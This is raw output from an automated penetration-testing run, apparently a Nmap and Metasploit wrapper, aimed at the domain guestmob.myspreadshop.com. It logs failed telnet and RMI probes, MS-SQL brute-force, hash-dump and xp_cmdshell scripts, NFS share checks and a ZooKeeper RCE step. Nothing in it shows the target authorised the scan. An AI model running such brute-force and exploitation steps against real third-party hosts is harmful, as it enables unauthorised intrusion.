[-] 151.101.194.137:9999  - Connection reset by peer ["/usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'", "/usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:160:in `recv_telnet'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:146:in `recv'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:125:in `block in connect'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:123:in `connect'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:35:in `block in run_host'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:34:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:474:in `block in create_with_logging_context'"]
[*] guestmob.myspreadshop.com:9999 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.2.137:9999    - Connection reset by peer ["/usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'", "/usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:160:in `recv_telnet'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:146:in `recv'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:125:in `block in connect'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:123:in `connect'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:35:in `block in run_host'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:34:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:474:in `block in create_with_logging_context'"]
[*] guestmob.myspreadshop.com:9999 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.66.137:9999   - Connection reset by peer ["/usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'", "/usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:160:in `recv_telnet'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:146:in `recv'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:125:in `block in connect'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:123:in `connect'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:35:in `block in run_host'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:34:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:474:in `block in create_with_logging_context'"]
[*] guestmob.myspreadshop.com:9999 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.130.137:9999  - Connection reset by peer ["/usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'", "/usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:160:in `recv_telnet'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:146:in `recv'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:125:in `block in connect'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:123:in `connect'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:35:in `block in run_host'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:34:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:474:in `block in create_with_logging_context'"]
[*] guestmob.myspreadshop.com:9999 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:9999 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:9999 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:9999 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:9999 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](14:58)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](14:58)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:58 EST
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:58
Completed NSE at 14:58, 0.00s elapsed
Initiating NSE at 14:58
Completed NSE at 14:58, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:58
Completed Parallel DNS resolution of 1 host. at 14:58, 0.09s elapsed
Initiating SYN Stealth Scan at 14:58
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 1099/tcp on 151.101.130.137
Completed SYN Stealth Scan at 14:58, 0.09s elapsed (1 total ports)
Initiating Service scan at 14:58
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:00, 158.96s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:00
Completed Traceroute at 15:00, 0.16s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:00
Completed Parallel DNS resolution of 1 host. at 15:00, 0.07s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:00
Completed NSE at 15:00, 5.07s elapsed
Initiating NSE at 15:00
Completed NSE at 15:00, 1.09s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.12s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649

PORT     STATE SERVICE      VERSION
1099/tcp open  rmiregistry?
|_rmi-vuln-classloader: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (90%), Linux 5.0 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.3 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.500 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 1099/tcp)
HOP RTT       ADDRESS
1   155.68 ms 151.101.130.137

NSE: Script Post-scanning.
Initiating NSE at 15:00
Completed NSE at 15:00, 0.00s elapsed
Initiating NSE at 15:00
Completed NSE at 15:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.70 seconds
           Raw packets sent: 69 (6.488KB) | Rcvd: 46 (3.012KB)
====================================================================================•x[2022-02-21](15:00)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](15:00)x•
RHOST => guestmob.myspreadshop.com
[*] Running module against 151.101.2.137
[*] 151.101.2.137:1099 - Sending RMI Header...
[-] 151.101.2.137:1099 - Failed to negotiate RMI protocol
[*] Running module against 151.101.66.137
[*] 151.101.66.137:1099 - Sending RMI Header...
[-] 151.101.66.137:1099 - Failed to negotiate RMI protocol
[*] Running module against 151.101.130.137
[*] 151.101.130.137:1099 - Sending RMI Header...
[-] 151.101.130.137:1099 - Failed to negotiate RMI protocol
[*] Running module against 151.101.194.137
[*] 151.101.194.137:1099 - Sending RMI Header...
[-] 151.101.194.137:1099 - Failed to negotiate RMI protocol
[*] Running module against 2a04:4e42:600::649
[*] 2a04:4e42:600::649:1099 - Sending RMI Header...
[-] 2a04:4e42:600::649:1099 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:600::649]:1099) was unreachable.
[-] 2a04:4e42:600::649:1099 - Call stack:
[-] 2a04:4e42:600::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:600::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:600::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:600::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:600::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:600::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:600::649:1099 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:600::649:1099 -   /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42::649
[*] 2a04:4e42::649:1099 - Sending RMI Header...
[-] 2a04:4e42::649:1099 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42::649]:1099) was unreachable.
[-] 2a04:4e42::649:1099 - Call stack:
[-] 2a04:4e42::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42::649:1099 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42::649:1099 -   /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42:200::649
[*] 2a04:4e42:200::649:1099 - Sending RMI Header...
[-] 2a04:4e42:200::649:1099 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:200::649]:1099) was unreachable.
[-] 2a04:4e42:200::649:1099 - Call stack:
[-] 2a04:4e42:200::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:200::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:200::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:200::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:200::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:200::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:200::649:1099 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:200::649:1099 -   /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42:400::649
[*] 2a04:4e42:400::649:1099 - Sending RMI Header...
[-] 2a04:4e42:400::649:1099 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:400::649]:1099) was unreachable.
[-] 2a04:4e42:400::649:1099 - Call stack:
[-] 2a04:4e42:400::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:400::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:400::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:400::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:400::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:400::649:1099 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:400::649:1099 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:400::649:1099 -   /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Auxiliary module execution completed
RHOST => guestmob.myspreadshop.com
[-] 151.101.2.137:1099    - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.66.137:1099   - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.130.137:1099  - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.194.137:1099  - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 1433 opened... running tests...
====================================================================================•x[2022-02-21](15:02)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:02)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:02 EST
NSE: Loaded 57 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:02
Completed NSE at 15:02, 0.00s elapsed
Initiating NSE at 15:02
Completed NSE at 15:02, 0.00s elapsed
Initiating NSE at 15:02
Completed NSE at 15:02, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:02
Completed Parallel DNS resolution of 1 host. at 15:02, 0.08s elapsed
Initiating SYN Stealth Scan at 15:02
Scanning guestmob.myspreadshop.com (151.101.66.137) [1 port]
Discovered open port 1433/tcp on 151.101.66.137
Completed SYN Stealth Scan at 15:02, 0.10s elapsed (1 total ports)
Initiating Service scan at 15:02
Scanning 1 service on guestmob.myspreadshop.com (151.101.66.137)
Completed Service scan at 15:05, 158.53s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.66.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.66.137)
Initiating Traceroute at 15:05
Completed Traceroute at 15:05, 0.13s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:05
Completed Parallel DNS resolution of 1 host. at 15:05, 0.12s elapsed
NSE: Script scanning 151.101.66.137.
Initiating NSE at 15:05
Completed NSE at 15:05, 20.66s elapsed
Initiating NSE at 15:05
Completed NSE at 15:06, 20.54s elapsed
Initiating NSE at 15:06
Completed NSE at 15:06, 5.34s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.66.137)
Host is up (0.10s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.130.137 151.101.194.137 151.101.2.137 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649

PORT     STATE SERVICE   VERSION
1433/tcp open  ms-sql-s?
| ms-sql-brute: 
|   [151.101.66.137:1433]
|     No credentials found
|     Errors:
|_      Network error. Skipping instance. Error: ERROR
| ms-sql-hasdbaccess: 
|   [151.101.66.137:1433]
|_    ERROR: No login credentials.
| ms-sql-tables: 
|   [151.101.66.137:1433]
|_    ERROR: No login credentials.
| ms-sql-dump-hashes: 
| [151.101.66.137:1433]
|_  ERROR: No login credentials
| ms-sql-query: 
|   (Use --script-args=ms-sql-query.query='<QUERY>' to change query.)
|   [151.101.66.137:1433]
|_    ERROR: No login credentials
| ms-sql-xp-cmdshell: 
|   (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.)
|   [151.101.66.137:1433]
|_    ERROR: No login credentials.
| ms-sql-config: 
|   [151.101.66.137:1433]
|_    ERROR: No login credentials
| ms-sql-empty-password: 
|   [151.101.66.137:1433]
|_    Network error. Error: ERROR
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 20.966 days (since Mon Jan 31 15:54:55 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 1433/tcp)
HOP RTT       ADDRESS
1   124.12 ms 151.101.66.137

NSE: Script Post-scanning.
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 211.66 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 37 (2.344KB)
 + -- --=[Port 2049 opened... running tests...
====================================================================================•x[2022-02-21](15:06)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:06)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:06 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:06
Completed Parallel DNS resolution of 1 host. at 15:06, 0.06s elapsed
Initiating SYN Stealth Scan at 15:06
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 2049/tcp on 151.101.130.137
Completed SYN Stealth Scan at 15:06, 0.09s elapsed (1 total ports)
Initiating Service scan at 15:06
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:08, 158.87s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:08
Completed Traceroute at 15:08, 0.12s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:08
Completed Parallel DNS resolution of 1 host. at 15:08, 0.09s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:08
Completed NSE at 15:08, 0.00s elapsed
Initiating NSE at 15:08
Completed NSE at 15:08, 1.10s elapsed
Initiating NSE at 15:08
Completed NSE at 15:08, 0.00s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.10s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649

PORT     STATE SERVICE VERSION
2049/tcp open  nfs?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.505 days (since Tue Jan 25 03:01:20 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 2049/tcp)
HOP RTT       ADDRESS
1   116.91 ms 151.101.130.137

NSE: Script Post-scanning.
Initiating NSE at 15:08
Completed NSE at 15:08, 0.00s elapsed
Initiating NSE at 15:08
Completed NSE at 15:08, 0.00s elapsed
Initiating NSE at 15:08
Completed NSE at 15:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.56 seconds
           Raw packets sent: 71 (6.592KB) | Rcvd: 51 (3.368KB)
====================================================================================•x[2022-02-21](15:08)x•
 RUNNING RPCINFO 
====================================================================================•x[2022-02-21](15:08)x•
guestmob.myspreadshop.com: RPC: Unable to receive
====================================================================================•x[2022-02-21](15:09)x•
 RUNNING SHOWMOUNT 
====================================================================================•x[2022-02-21](15:09)x•
clnt_create: RPC: Unable to send
====================================================================================•x[2022-02-21](15:10)x•
 CHECKING FOR NULL SHARES 
====================================================================================•x[2022-02-21](15:10)x•
do_connect: Connection to guestmob.myspreadshop.com failed (Error NT_STATUS_IO_TIMEOUT)
 + -- --=[Port 2181 opened... running tests...
====================================================================================•x[2022-02-21](15:10)x•
 RUNNING ZOOKEEPER RCE EXPLOIT 
====================================================================================•x[2022-02-21](15:10)x•
 + -- --=[Port 3306 closed... skipping.
 + -- --=[Port 3310 opened... running tests...
====================================================================================•x[2022-02-21](15:10)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:10)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:10 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:10
